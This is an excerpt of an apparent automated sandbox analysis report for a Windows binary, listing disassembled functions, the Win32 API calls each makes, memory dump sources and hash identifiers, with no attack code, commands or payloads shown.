                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                  • String ID:
                                  • API String ID: 3321077145-0
                                  • Opcode ID: 7a834fb0b66ddf899476a86fe0232f242122b76d3cc02cdb5bdf9ec64e3050b4
                                  • Instruction ID: d28793a9ab7b7efa1a8fefe20f189cfe1bf18ba40ac163a49649682692a57a08
                                  • Opcode Fuzzy Hash: 7a834fb0b66ddf899476a86fe0232f242122b76d3cc02cdb5bdf9ec64e3050b4
                                  • Instruction Fuzzy Hash: 18413C39600610DFCB12DF15C444E5EBBE1AF89721B198888EC4A9F362DB31FD45CB91
                                  Function 0038D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                  Download Yara Rule
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00376D71,00000000,00000000,003782D9,?,003782D9,?,00000001,00376D71,?,00000001,003782D9,003782D9), ref: 0038D910
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0038D999
                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0038D9AB
                                  • __freea.LIBCMT ref: 0038D9B4
                                    • Part of subcall function 00383820: RtlAllocateHeap.NTDLL(00000000,?,00421444,?,0036FDF5,?,?,0035A976,00000010,00421440,003513FC,?,003513C6,?,00351129), ref: 00383852
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                  • String ID:
                                  • API String ID: 2652629310-0
                                  • Opcode ID: 104a90a77fe8529d76dc8054ef1f0460cf27cea99efaa098eeaa52bde2028920
                                  • Instruction ID: 17dfd2903296c8d87ba6f5c569f803684d943629fd41864b3cb970fec0da753d
                                  • Opcode Fuzzy Hash: 104a90a77fe8529d76dc8054ef1f0460cf27cea99efaa098eeaa52bde2028920
                                  • Instruction Fuzzy Hash: D631B372A00316ABDF26AF65DC81EAE7BA5EB41710F0641A8FC08DB190E735DD51CB90
                                  Function 003E52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 003E5352
                                  • GetWindowLongW.USER32(?,000000F0), ref: 003E5375
                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003E5382
                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003E53A8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: LongWindow$InvalidateMessageRectSend
                                  • String ID:
                                  • API String ID: 3340791633-0
                                  • Opcode ID: 761c8b8e29825c6ea380e2688f48471864ab0b666f639d908723f48ed6e9984f
                                  • Instruction ID: 718eea6f0725c214c24a807b71322e845aff01a33f8340c26865f0317a8d195e
                                  • Opcode Fuzzy Hash: 761c8b8e29825c6ea380e2688f48471864ab0b666f639d908723f48ed6e9984f
                                  • Instruction Fuzzy Hash: 5831F43CA55AA8EFEB339E16CC45BE97765AB04394F594301FA10962E1C7B099409B41
                                  Function 003BAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 003BABF1
                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 003BAC0D
                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 003BAC74
                                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 003BACC6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: KeyboardState$InputMessagePostSend
                                  • String ID:
                                  • API String ID: 432972143-0
                                  • Opcode ID: 937039f0f2fdd44ec0ec64b5c6d8dd53987bc43cf44d15b1c32b6206c406f23b
                                  • Instruction ID: 8e6e05e00b4ef1827bffca83ed97c87fade2eca22e43203cccf4ee31fe266d63
                                  • Opcode Fuzzy Hash: 937039f0f2fdd44ec0ec64b5c6d8dd53987bc43cf44d15b1c32b6206c406f23b
                                  • Instruction Fuzzy Hash: 0D315970A00F186FEF37CB648C447FE7FA9AB85318F04431AE681D69D1C374898187A2
                                  Function 003E7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ClientToScreen.USER32(?,?), ref: 003E769A
                                  • GetWindowRect.USER32(?,?), ref: 003E7710
                                  • PtInRect.USER32(?,?,003E8B89), ref: 003E7720
                                  • MessageBeep.USER32(00000000), ref: 003E778C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Rect$BeepClientMessageScreenWindow
                                  • String ID:
                                  • API String ID: 1352109105-0
                                  • Opcode ID: d045552a33e56a9c974ed7bc490c97416de4013c00066e8dd511cbabb3385aff
                                  • Instruction ID: 483f1bea0c5765559dfa80fc819764398fff60e08a82feffd9939f3e874a12b3
                                  • Opcode Fuzzy Hash: d045552a33e56a9c974ed7bc490c97416de4013c00066e8dd511cbabb3385aff
                                  • Instruction Fuzzy Hash: 39417E746092A4DFDB12CF5AC894EB9B7F5BB49354F1542A8E8149B2A1C730A982CB90
                                  Function 003E16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetForegroundWindow.USER32 ref: 003E16EB
                                    • Part of subcall function 003B3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 003B3A57
                                    • Part of subcall function 003B3A3D: GetCurrentThreadId.KERNEL32 ref: 003B3A5E
                                    • Part of subcall function 003B3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003B25B3), ref: 003B3A65
                                  • GetCaretPos.USER32(?), ref: 003E16FF
                                  • ClientToScreen.USER32(00000000,?), ref: 003E174C
                                  • GetForegroundWindow.USER32 ref: 003E1752
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                  • String ID:
                                  • API String ID: 2759813231-0
                                  • Opcode ID: c0229c9e1ab558f838635fabf4e35d905955625c2885d31d9de20182de8a936e
                                  • Instruction ID: 065c176a905a6c140fa5fccf129c52f12f4d259d9a7b2a93d1abf51283c515fd
                                  • Opcode Fuzzy Hash: c0229c9e1ab558f838635fabf4e35d905955625c2885d31d9de20182de8a936e
                                  • Instruction Fuzzy Hash: F9314175D00259AFC701EFAAC881CEEB7FDEF48308B508069E815EB251D7319E45CBA0
                                  Function 003BD4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 003BD501
                                  • Process32FirstW.KERNEL32(00000000,?), ref: 003BD50F
                                  • Process32NextW.KERNEL32(00000000,?), ref: 003BD52F
                                  • CloseHandle.KERNEL32(00000000), ref: 003BD5DC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: a8950c8f4cfc473bf465f7a187fc07b2cd8cf1644dc314b4b25e08ad4af37cf2
                                  • Instruction ID: 7b168740ba2a0cf2cbfee4ec27d9b74b7e314b51bfe0c25783860bc72c404c31
                                  • Opcode Fuzzy Hash: a8950c8f4cfc473bf465f7a187fc07b2cd8cf1644dc314b4b25e08ad4af37cf2
                                  • Instruction Fuzzy Hash: 023193711083409FD312EF54C881EAFBBF8EF99354F14092DF9819B1A2EB719949CB92
                                  Function 003E8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00369BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00369BB2
                                  • GetCursorPos.USER32(?), ref: 003E9001
                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,003A7711,?,?,?,?,?), ref: 003E9016
                                  • GetCursorPos.USER32(?), ref: 003E905E
                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,003A7711,?,?,?), ref: 003E9094
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                  • String ID:
                                  • API String ID: 2864067406-0
                                  • Opcode ID: cf4b22680a8093aa172e219fae9836f26ecf30e3e636d59a91e97b572331e948
                                  • Instruction ID: b19173fb04e3ae056e51f30d6e80d97f9a4ab4586010f5fb1d363c73cd03c105
                                  • Opcode Fuzzy Hash: cf4b22680a8093aa172e219fae9836f26ecf30e3e636d59a91e97b572331e948
                                  • Instruction Fuzzy Hash: BF21B471600164EFCB268F56C894FEA3BB9EB4A350F444266F5054B1E1C7319E91DB60
                                  Function 003BD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesW.KERNEL32(?,003ECB68), ref: 003BD2FB
                                  • GetLastError.KERNEL32 ref: 003BD30A
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 003BD319
                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,003ECB68), ref: 003BD376
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                  • String ID:
                                  • API String ID: 2267087916-0
                                  • Opcode ID: cd7de18f790974ab1592a65598a8cf852aa8421d361ee5313b9875da38d1d484
                                  • Instruction ID: 43d81efbe6f3aaef6bc343be530c82382d63606404058facdd1c0380b49ce129
                                  • Opcode Fuzzy Hash: cd7de18f790974ab1592a65598a8cf852aa8421d361ee5313b9875da38d1d484
                                  • Instruction Fuzzy Hash: 2E217474505301DF8711DF24C8818AE77E8AE55358F104A1DF99ACB6E2E731D94ACB93
                                  Function 003B1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003B1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003B102A
                                    • Part of subcall function 003B1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003B1036
                                    • Part of subcall function 003B1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B1045
                                    • Part of subcall function 003B1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003B104C
                                    • Part of subcall function 003B1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B1062
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003B15BE
                                  • _memcmp.LIBVCRUNTIME ref: 003B15E1
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003B1617
                                  • HeapFree.KERNEL32(00000000), ref: 003B161E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                  • String ID:
                                  • API String ID: 1592001646-0
                                  • Opcode ID: 973647fd4617bdbf5f7b1631301fbf90b468cc5b7ba98859a8d6faf1427eb357
                                  • Instruction ID: cd451deb5d1ebefdc1761d3b33c170aca30d1f2bed630a99090f7b559e527ea6
                                  • Opcode Fuzzy Hash: 973647fd4617bdbf5f7b1631301fbf90b468cc5b7ba98859a8d6faf1427eb357
                                  • Instruction Fuzzy Hash: C621B032E00108EFDF11DFA4C955BEEB7B8EF45348F494459E941AB241E730AE05CBA0
                                  Function 003E2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetWindowLongW.USER32(?,000000EC), ref: 003E280A
                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003E2824
                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003E2832
                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003E2840
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Window$Long$AttributesLayered
                                  • String ID:
                                  • API String ID: 2169480361-0
                                  • Opcode ID: fa705c9b70d95e5e7bcf6b1c0d661918d79e6ceaaf76d74e2c60b9420696f292
                                  • Instruction ID: 27e8a7e9e1fb7fd20c4740f873e29c2ab75347c24cf47eeb7203a773d39ef4b4
                                  • Opcode Fuzzy Hash: fa705c9b70d95e5e7bcf6b1c0d661918d79e6ceaaf76d74e2c60b9420696f292
                                  • Instruction Fuzzy Hash: 3321C4312041A1AFD7169B25C845F6B779DAF46324F158258F8268F6E2CB71FC42C7D0
                                  Function 003B78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003B8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,003B790A,?,000000FF,?,003B8754,00000000,?,0000001C,?,?), ref: 003B8D8C
                                    • Part of subcall function 003B8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 003B8DB2
                                    • Part of subcall function 003B8D7D: lstrcmpiW.KERNEL32(00000000,?,003B790A,?,000000FF,?,003B8754,00000000,?,0000001C,?,?), ref: 003B8DE3
                                  • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,003B8754,00000000,?,0000001C,?,?,00000000), ref: 003B7923
                                  • lstrcpyW.KERNEL32(00000000,?), ref: 003B7949
                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,003B8754,00000000,?,0000001C,?,?,00000000), ref: 003B7984
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: lstrcmpilstrcpylstrlen
                                  • String ID: cdecl
                                  • API String ID: 4031866154-3896280584
                                  • Opcode ID: ec28fc18855acd4e98dbb533be6e72f621ff1b2c408be4bb97cb0d9e95b14898
                                  • Instruction ID: ce022c407c94e0492115ed92217a10600419a84a7382996cea832f2d41e4bb87
                                  • Opcode Fuzzy Hash: ec28fc18855acd4e98dbb533be6e72f621ff1b2c408be4bb97cb0d9e95b14898
                                  • Instruction Fuzzy Hash: 7011E93A201341AFCB269F34D845DBA77A9FF85354B50502AFA46CB6A4EB31D811C751
                                  Function 003E5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,00001060,?,00000004), ref: 003E56BB
                                  • _wcslen.LIBCMT ref: 003E56CD
                                  • _wcslen.LIBCMT ref: 003E56D8
                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 003E5816
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageSend_wcslen
                                  • String ID:
                                  • API String ID: 455545452-0
                                  • Opcode ID: f2083273fa03a3a63c90d2c7f05b19eaaa7e2e9174247f500de621dafc7dab0c
                                  • Instruction ID: 944fd6f4ad94ffab24d4897972c5d44629c4ffcfab610a4dc863611f36dbf6db
                                  • Opcode Fuzzy Hash: f2083273fa03a3a63c90d2c7f05b19eaaa7e2e9174247f500de621dafc7dab0c
                                  • Instruction Fuzzy Hash: 4C1103316006A996DF229F63CCC1AEE77ACEF11368F108226F905DA1C1E770CA84CF60
                                  Function 003B1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 003B1A47
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003B1A59
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003B1A6F
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003B1A8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
